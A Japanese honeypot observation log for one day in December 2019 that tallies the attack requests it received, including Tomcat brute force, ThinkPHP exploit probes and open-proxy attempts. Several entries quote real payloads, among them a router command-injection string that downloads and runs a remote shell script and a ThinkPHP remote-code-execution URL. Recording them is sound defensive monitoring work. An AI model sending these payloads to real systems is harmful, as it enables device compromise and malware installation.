WOWHoneypot観察(288日目)
2019/12/29(日)
トータルは153件でした。
ハンティングログは以下です。
188.222.49[.]45 wget hxxp[:]//176.123.4[.]234/Dlinkrep.sh |
件数 | 概要 | リクエスト |
---|---|---|
4227 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
68 | アクセス | GET / |
4 | 不正中継の試み | CONNECT www.sogou.com:443 |
3 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
3 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
3 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
2 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
2 | 不明 | GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status |
2 | 不正中継の試み | CONNECT ip.ws.126.net:443 |
1 | 不明 | POST /goform/webLogin |
1 | 不正中継の調査 | HEAD hxxp[:]//123.125.114.144/ |
1 | 不正中継の調査 | HEAD hxxp[:]//112.124.42.80:63435/ |
1 | 不正中継の調査 | GET xxp//www.123cha.com/ |
1 | phpMyAdminの調査 | GET /mysql/admin/index.php?lang=en |
1 | ルーターの脆弱性を狙った通信 | GET /login.cgi?cli=aa%20aa%27;wget%20xxp//176.123.4.234/Dlinkrep.sh%20-O%20-%3E%20/tmp/kh;Dlinkrep.sh%20/tmp/kh%27$ |
1 | Silverlightのドメイン間ポリシーファイルの調査 | GET /clientaccesspolicy.xml |
1 | cfgファイルの調査 | GET /.cfg |
1 | 不正中継の試み | CONNECT www.ipip.net:443 |
1 | 不正中継の試み | CONNECT www.instagram.com:443 |
1 | 不正中継の試み | CONNECT www.baidu.com:443 |
1 | 不正中継の試み | CONNECT cn.bing.com:443 |